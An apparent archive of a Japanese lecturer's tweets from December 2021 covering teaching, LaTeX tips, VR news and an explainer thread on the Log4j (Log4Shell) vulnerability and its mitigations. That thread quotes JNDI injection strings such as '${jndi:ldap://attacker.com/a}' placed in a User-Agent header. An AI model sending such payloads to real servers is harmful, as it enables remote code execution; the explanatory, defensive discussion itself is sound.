講義を受け持っている大学院は学生カルテなりでプロファイルを読み解くこともできるし、学務サポートスタッフがしっかり同席して録画してくれているから助かる部分もあるけど、それがないと先生なんていつだって全裸で歩いているようなもので、怖いです。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
衣一枚あるかないかの違いは大きい、感謝。
先生をイジメ殺した自慢ツイートとか見かけると、祈らずにはいられない。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
その先生も、学生さんも。
強くなくても優しくはなれる
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
強者の優しさは普通の優しさ
弱者の優しさは下心
マッチョな強さは自分のため
汗をかく楽しみは自分だけ
本当の強さと優しさは
いろんな痛みがわかる人
この話の前後の乖離と
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
学校が廃校になったって話
極端な話に見えるけど
多くの場合はその2層の間 https://t.co/KZk5IXd0QF
というわけで
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
自分は柔軟な学びをサポートすべく、ガチな課題をやりたい人にはガチに、
程よく登山経験の入り口を学びたい人にはそれなりに、という環境やスキルを配慮した合理的な課題設定にします。
note投稿しました。
— イワケン@XR界の吉田松陰 (@iwaken71) December 21, 2021
12/19(日)にIwakenLab.ミートアップを行い、 ゲストに白井博士(@o_ob )来ていただきました。
Iwaken Lab.ミートアップ12月社会人ゲスト:白井博士 XR/メタバース企業のインターンESにチャレンジ|イワケン @iwaken71 #note https://t.co/VJLm5aAHKj
#Googleで検索できないもの
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
– 中国のインターネット
– 日本の特許
– おまえが持ってない言葉や概念
– おまえの頭の中
– おまえがやれないこと
Wayback Machineもまだわずか25周年ですねhttps://t.co/In1HK29xnZ
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
#WhatYouCanNotFindOnGoogle
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
– Internet in China
– Japanese patents
– Language, words and concepts you don't have
– What's in your head
– Things you have not done
日本語版は冗長性を含めて強めだけど
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
英語版はちょっとだけ柔らかくしといた
1. Search results of Chinese websites are not optimized. And most Google agents are blocked.
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
2. J-platpat is greater than Google Patent.
3. No words, no results.
4. You can not describe entire of you.
5. Your things which you can not do, or not yet completed. (=you can do it)
Interesting, 英語もそれなりに綴りが長くて
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
「いいね!」「それな!」
みたいなのは cool! だったりするので
"興ある"きょうある!とかはいかがでしょう
参考「おもしろい」の語源まとめhttps://t.co/nuzhKF1JjV https://t.co/fV5YhVuREo
「cool!」と心の中で思いながら
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021
「きょぅぁる!」といえば互換性バッチリ
おはようございます(眠い)
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
おはようございます
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
いつも元気でありがとう😊
おはようございますにゃー🐱
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
メタバースなC99がはじまる
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
おきゅえ【A5冊子版】 | まいてぃ屋 https://t.co/SeaoIc2Umg #booth_pm
作家さんからの直接の呼びかけ&
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
電子版は出ない冊子のみだったので即買い
楽天ポイントも使えるし…
昼休みは何食べようかな
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
ドリフト?峠?豆腐店?
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
車内は寒くないけど心は寒くなるやつ…
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
LaTeX初心者に学会テンプレや卒論の書き方、数式、参考文献の集め方ぐらいまでレクチャーして90分以下で教え切ったのですが、これ動画コンテンツで観たい人けこういそうな気がする。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
昔こんなBlog書いた、更新したい。https://t.co/aZGYzbVGA6
今日新しく学んだこと。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
Texのオミクロンは「 o」
他のギリシャ文字のようにバックスラッシュは入らない。これは明らかにヤベーやつ!
え、欲しい?
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
今日の発見。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
Google Apps ScriptをGoogle Slidesで使っているのですが、ドキュメントを作ったアカウントによって取得できる日付時刻(new Date)が違う。
さてどうやって回避したものか…。#GAS #NoCode pic.twitter.com/bMHY3jEog7
解決方法:
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
Scriptのプロジェクトの設定から
☑「appsscript.json」マニフェスト ファイルをエディタで表示する
デフォルトでは編集できない AppsScript.json が編集できる。ここの
"timeZone": "America/New_York",
↓
"timeZone": "Asia/Tokyo",
として保存して実行しなおせばOK。 pic.twitter.com/5Z0a0QXhAW
ちょっと編集する必要があるのでちょっと時間くださいね
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
ちなみにどんなこと聞きたいとか、リクエストあれば聞いておきたいです
インパクトありすぎて中身が頭に入ってこない
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
さっき解説してました!
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
(録画に残っているかチェックしますが)
基本は
begin{figure}[htbp]
centering
includegraphics[width=linewidth]{fig/filename.png}
caption{絶対書く、何があっても書く}
label{fig:refで使う}
end{figure}
[htbp]はhでいいと思います、hereの略。
こんな感じのtips、ベストプラクティスなどを短い時間でお伝えする動画…需要ありそうであればRTかコメントいただけると幸いです。https://t.co/adZFTvs4Xy
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
続きはこちらのスレッドで・・・https://t.co/dGqFMvf8lf
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
#IVRC2021 これはすごい作品だった
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
IKEPさん詳細情報公開助かる、というか読み応えある…!
「駆け出しだった大学生」がVRコンテストで2作品作って準優勝したお話 – IKEPの制作ブログ https://t.co/CR4EdpmOMJ
Overleaf、学生さんなら https://t.co/u1d593GvtG のアドレスで登録しておくと無料でプロ並みアカウントの利用ができる。うまく認定されない場合は一番下のコンタクトで問い合わせてみるといいはず。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
あとはIEEE会員なら会費のオファーで利用できる。https://t.co/lV64O4lE9j
Three Planets and a Comet via NASA https://t.co/3wFlIhxI6y pic.twitter.com/8A9w6KsDnu
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
むしろRasPi抜きキットで売る時代かも…SDカードが高く売れる
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
TigerHixさんの「AlterEcho」、弊ラボのなかで丁寧に日本語訳しながら読んでたら別メディアから公開されてしまった様子…まあいいか、評価も含めてISMAR2021採択のすばらしい論文。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
VTuberの動きをオーバーリアクションに自動変換 中の人の表情などをアニメーションに反映https://t.co/BUgh1J1Vuy https://t.co/3K9IyF9L66
これは、すごい…メタバースにタイムマシンが実装されている…(サーバエンジニア向け) https://t.co/rGEoAffT0K
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
タイカレー食べてました
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
オミクロン株とLog4j(CVE-2021-44228)だったらどちらが怖いか…というとどっちも怖いな…
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
担当者が年末を迎えられるか、年末に誰にも会えないか、という視点では同じなのかもしれないけど(つらい)https://t.co/FO7AbDaFNo pic.twitter.com/59o51rKzJy
「年末年始ってのは、サーバメンテとかGithub Pagesのメンテをするシーズンなんですよ。大掃除や年賀状と同じ意味で」って学生に説明しておいた。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
Log4jにどうしてこんな機能があるのか、どんなコード書いたらこんなことになるのか興味あるな…。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
本家https://t.co/7Ye1M2q87A
Log4jの脆弱性を検証、NTTデータ先端技術がレポートを発表 ~「脆弱性の悪用が可能なことを確認」 https://t.co/353moCnzoB
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
これがテキトーな名前のLDAPサーバにアクセスする前に止めるコードか。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
12月5日にApacheのRalph Goersによってテストコードも書かれている。
log4j-core/src/test/java/org/apache/logging/log4j/core/lookup/JndiRestrictedLookupTest.java
孤独な闘いだな…これは。https://t.co/DDTSukJLJk pic.twitter.com/4YvTllCheK
このへんか…この応用でいろんな攻撃方法ありそうだな…https://t.co/mlFIEtgzvs pic.twitter.com/dF6W1d8c2v
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
NTTデータさんによると、第2段階(JNDIの不正操作)JNDI Lookupにより、攻撃者のLDAPサーバー他、JNDI Lookupで以下も利用可能か…
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
・LDAP
・DNS
・RMI
・NDS
・NIS
・CORBA
その先の不正なClassファイルの読み込みによる任意のコード実行を潰したほうがよさそうだけど、それは実装されてないっぽい。
JndiLookupを削除するってのは悪くない解決策かもしれんね。まだ感染していないなら。https://t.co/oJcGTxHYSC
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
12/22時点の脆弱性の暫定的な回避策
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
14日時点で発表された対策は、特定の攻撃に対して不十分であったことがベンダーによって明らかになった。現在は、JndiLookupクラスをクラスパスから削除する対策が推奨。
【続報】IPA、Apache Log4jの脆弱性についての対策を更新https://t.co/bj3SaIpZxr
log4jにどうしてこんな機能があるのか?という疑問だったんだけど、いわゆるロガーとしてファイルに保存する以外にAppenderといって、外部のコンピュータにログを保存させる機能があるからなのね。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
どうせ使いこなせてないログなら、潰して…と思ったらこれで外部連携とか書いてる地獄があるかもね
${jndi:ldap://example.com/file}
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
こんな感じで広範に使われているjavaのログシステムに、LDAPを介したルックアップを指定することにより、任意のURLを照会させてJavaオブジェクトデータとしてロードできる。#Log4Shellhttps://t.co/HV8D2EG7J0
とりあえずlog4j脆弱性の根っこは理解したけど、これって、log4jsとかlog4netとかnpmlogとかにも似たような脆弱性あるのかもしれんね…。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
ちなみに最初の発見者はAlibaba Cloudのセキュリティチーム Chen Zhaojunさん(2021/11/24)。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
これはコロナウイルスの再誕みたいなやつだな…。
GoogleがLog4jを脆弱性で影響を受けるであろう500のパッケージについてレポートしている。https://t.co/7GRhDc3ZTR
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
#Log4j 概念コード。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
import org.apache.log4j.Logger;
static Logger log = Logger.getLogger(log4jExample.class.getName());
攻撃者は、User-Agentヘッダに
${jndi:ldap://attacker.com/a}
とか悪意の文字列を設定、https://t.co/4nI2uoLixK("Request User Agent:" + userAgent);
を呼べば💀
さて、セキュリティ的な影響範囲がわかったので、影響あるIT戦士のみなさまに祈りを捧げつつ、年末年始を尊い開発にささげよう…(頑張って…!!)
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
ブレスだけ別のWAVで保存できるのか…多言語も。Kanru Huaさんの母国語が中国語だから、ってのもすごい。
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
もはや人間と区別がつかない次元に。多言語で歌う機能も搭載したSynthesizer Vの破壊力 https://t.co/fNDlNEnLRv
デジタルハリウッド大学 大学院
— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021
テクノロジー特論D(人工現実)第3講
講義録ツイート版いきます
Lecture 3「VR作品企画と体験設計」
まず前回講義の振り返り(一部)。
フィードバックにフィードバックをかけているのですが思考の質がギュン上がりしていて尊い…。#メタバース #メタバース学 #DHGSVR21 pic.twitter.com/y0sPovf8GT
講義を受け持っている大学院は学生カルテなりでプロファイルを読み解くこともできるし、学務サポートスタッフがしっかり同席して録画してくれているから助かる部分もあるけど、それがないと先生なんていつだって全裸で歩いているようなもので、怖いです。 衣一枚あるかないかの違いは大きい、感謝。 in reply to o_ob
先生をイジメ殺した自慢ツイートとか見かけると、祈らずにはいられない。 その先生も、学生さんも。 in reply to o_ob
強くなくても優しくはなれる 強者の優しさは普通の優しさ 弱者の優しさは下心 マッチョな強さは自分のため 汗をかく楽しみは自分だけ 本当の強さと優しさは いろんな痛みがわかる人 in reply to o_ob
この話の前後の乖離と 学校が廃校になったって話 極端な話に見えるけど 多くの場合はその2層の間 https://t.co/KZk5IXd0QF
というわけで 自分は柔軟な学びをサポートすべく、ガチな課題をやりたい人にはガチに、 程よく登山経験の入り口を学びたい人にはそれなりに、という環境やスキルを配慮した合理的な課題設定にします。 in reply to o_ob
RT @iwaken71: note投稿しました。 12/19(日)にIwakenLab.ミートアップを行い、 ゲストに白井博士(@o_ob )来ていただきました。 Iwaken Lab.ミートアップ12月社会人ゲスト:白井博士 XR/メタバース企業のインターンESにチャ…
#Googleで検索できないもの – 中国のインターネット – 日本の特許 – おまえが持ってない言葉や概念 – おまえの頭の中 – おまえがやれないこと
@CUEICHI Wayback Machineもまだわずか25周年ですね https://t.co/In1HK29xnZ in reply to CUEICHI
#WhatYouCanNotFindOnGoogle – Internet in China – Japanese patents – Language, words and concepts you don't have -… https://t.co/MMZmLGEcXC in reply to o_ob
日本語版は冗長性を含めて強めだけど 英語版はちょっとだけ柔らかくしといた in reply to o_ob
1. Search results of Chinese websites are not optimized. And most Google agents are blocked. 2. J-platpat is greate… https://t.co/RWr89ooSxV in reply to o_ob
Interesting, 英語もそれなりに綴りが長くて 「いいね!」「それな!」 みたいなのは cool! だったりするので "興ある"きょうある!とかはいかがでしょう 参考「おもしろい」の語源まとめ… https://t.co/tWN4iYKsO6
@yknsdt 「cool!」と心の中で思いながら 「きょぅぁる!」といえば互換性バッチリ in reply to yknsdt
おはようございます(眠い)
@decky_vrc おはようございます いつも元気でありがとう😊 in reply to decky_vrc
@Fuwarin おはようございますにゃー🐱 in reply to Fuwarin
メタバースなC99がはじまる おきゅえ【A5冊子版】 | まいてぃ屋 https://t.co/SeaoIc2Umg #booth_pm
作家さんからの直接の呼びかけ& 電子版は出ない冊子のみだったので即買い 楽天ポイントも使えるし… in reply to o_ob
昼休みは何食べようかな
@tama_Ud ドリフト?峠?豆腐店? in reply to tama_Ud
@Juliconyan 車内は寒くないけど心は寒くなるやつ… in reply to Juliconyan
LaTeX初心者に学会テンプレや卒論の書き方、数式、参考文献の集め方ぐらいまでレクチャーして90分以下で教え切ったのですが、これ動画コンテンツで観たい人けこういそうな気がする。 昔こんなBlog書いた、更新したい。 https://t.co/aZGYzbVGA6
今日新しく学んだこと。 Texのオミクロンは「 o」 他のギリシャ文字のようにバックスラッシュは入らない。これは明らかにヤベーやつ! in reply to o_ob
@yknsdt え、欲しい? in reply to yknsdt
今日の発見。 Google Apps ScriptをGoogle Slidesで使っているのですが、ドキュメントを作ったアカウントによって取得できる日付時刻(new Date)が違う。 さてどうやって回避したものか…。 #GAS… https://t.co/mfOy9NkueG
解決方法: Scriptのプロジェクトの設定から ☑「appsscript.json」マニフェスト ファイルをエディタで表示する デフォルトでは編集できない AppsScript.json が編集できる。ここの "timeZo… https://t.co/d8N6B5jQU3 in reply to o_ob
@yknsdt ちょっと編集する必要があるのでちょっと時間くださいね ちなみにどんなこと聞きたいとか、リクエストあれば聞いておきたいです in reply to yknsdt
@tama_Ud インパクトありすぎて中身が頭に入ってこない in reply to tama_Ud
@yknsdt さっき解説してました! (録画に残っているかチェックしますが) 基本は \begin{figure}[htbp] \centering \includegraphics[width=\linewidth]{… https://t.co/eEa6X9TVBj in reply to yknsdt
こんな感じのtips、ベストプラクティスなどを短い時間でお伝えする動画…需要ありそうであればRTかコメントいただけると幸いです。 https://t.co/adZFTvs4Xy in reply to o_ob
@yknsdt 続きはこちらのスレッドで・・・ https://t.co/dGqFMvf8lf in reply to o_ob
#IVRC2021 これはすごい作品だった IKEPさん詳細情報公開助かる、というか読み応えある…! 「駆け出しだった大学生」がVRコンテストで2作品作って準優勝したお話 – IKEPの制作ブログ https://t.co/CR4EdpmOMJ
Overleaf、学生さんなら https://t.co/u1d593GvtG のアドレスで登録しておくと無料でプロ並みアカウントの利用ができる。うまく認定されない場合は一番下のコンタクトで問い合わせてみるといいはず。 あとはIE… https://t.co/f0WevdJzX7 in reply to o_ob
Three Planets and a Comet via NASA https://t.co/3wFlIhxI6y https://t.co/8A9w6KsDnu
@izm むしろRasPi抜きキットで売る時代かも…SDカードが高く売れる in reply to izm
TigerHixさんの「AlterEcho」、弊ラボのなかで丁寧に日本語訳しながら読んでたら別メディアから公開されてしまった様子…まあいいか、評価も含めてISMAR2021採択のすばらしい論文。 VTuberの動きをオーバーリア… https://t.co/V8Bkx68du8
これは、すごい…メタバースにタイムマシンが実装されている…(サーバエンジニア向け) https://t.co/rGEoAffT0K
@DbsfFcDB7tfd0Tf タイカレー食べてました in reply to DbsfFcDB7tfd0Tf
オミクロン株とLog4j(CVE-2021-44228)だったらどちらが怖いか…というとどっちも怖いな… 担当者が年末を迎えられるか、年末に誰にも会えないか、という視点では同じなのかもしれないけど(つらい)… https://t.co/pHBHSAA9Ig
「年末年始ってのは、サーバメンテとかGithub Pagesのメンテをするシーズンなんですよ。大掃除や年賀状と同じ意味で」って学生に説明しておいた。
Log4jにどうしてこんな機能があるのか、どんなコード書いたらこんなことになるのか興味あるな…。 本家 https://t.co/7Ye1M2q87A in reply to o_ob
Log4jの脆弱性を検証、NTTデータ先端技術がレポートを発表 ~「脆弱性の悪用が可能なことを確認」 https://t.co/353moCnzoB in reply to o_ob
これがテキトーな名前のLDAPサーバにアクセスする前に止めるコードか。 12月5日にApacheのRalph Goersによってテストコードも書かれている。 log4j-core/src/test/java/org/apache… https://t.co/E79B34Pe5b in reply to o_ob
このへんか…この応用でいろんな攻撃方法ありそうだな… https://t.co/mlFIEtgzvs https://t.co/dF6W1d8c2v in reply to o_ob
NTTデータさんによると、第2段階(JNDIの不正操作)JNDI Lookupにより、攻撃者のLDAPサーバー他、JNDI Lookupで以下も利用可能か… ・LDAP ・DNS ・RMI ・NDS ・NIS ・CORBA その先… https://t.co/5IGz17CRLb in reply to o_ob
JndiLookupを削除するってのは悪くない解決策かもしれんね。まだ感染していないなら。 https://t.co/oJcGTxHYSC in reply to o_ob
12/22時点の脆弱性の暫定的な回避策 14日時点で発表された対策は、特定の攻撃に対して不十分であったことがベンダーによって明らかになった。現在は、JndiLookupクラスをクラスパスから削除する対策が推奨。 【続報】IPA、… https://t.co/uuY0LxMTse in reply to o_ob
log4jにどうしてこんな機能があるのか?という疑問だったんだけど、いわゆるロガーとしてファイルに保存する以外にAppenderといって、外部のコンピュータにログを保存させる機能があるからなのね。 どうせ使いこなせてないログなら… https://t.co/deuIz3RxoD in reply to o_ob
${jndi:ldap://example.com/file} こんな感じで広範に使われているjavaのログシステムに、LDAPを介したルックアップを指定することにより、任意のURLを照会させてJavaオブジェクトデータとしてロー… https://t.co/8gmVR0bT0I in reply to o_ob
とりあえずlog4j脆弱性の根っこは理解したけど、これって、log4jsとかlog4netとかnpmlogとかにも似たような脆弱性あるのかもしれんね…。 in reply to o_ob
ちなみに最初の発見者はAlibaba Cloudのセキュリティチーム Chen Zhaojunさん(2021/11/24)。 これはコロナウイルスの再誕みたいなやつだな…。 in reply to o_ob
GoogleがLog4jを脆弱性で影響を受けるであろう500のパッケージについてレポートしている。 https://t.co/7GRhDc3ZTR in reply to o_ob
#Log4j 概念コード。 import org.apache.log4j.Logger; static Logger log = Logger.getLogger(log4jExample.class.getName());… https://t.co/lIXMLjT101 in reply to o_ob
さて、セキュリティ的な影響範囲がわかったので、影響あるIT戦士のみなさまに祈りを捧げつつ、年末年始を尊い開発にささげよう…(頑張って…!!)
ブレスだけ別のWAVで保存できるのか…多言語も。Kanru Huaさんの母国語が中国語だから、ってのもすごい。 もはや人間と区別がつかない次元に。多言語で歌う機能も搭載したSynthesizer Vの破壊力 https://t.co/fNDlNEnLRv
デジタルハリウッド大学 大学院 テクノロジー特論D(人工現実)第3講 講義録ツイート版いきます Lecture 3「VR作品企画と体験設計」 まず前回講義の振り返り(一部)。 フィードバックにフィードバックをかけているのですが思… https://t.co/aMfTlLZppA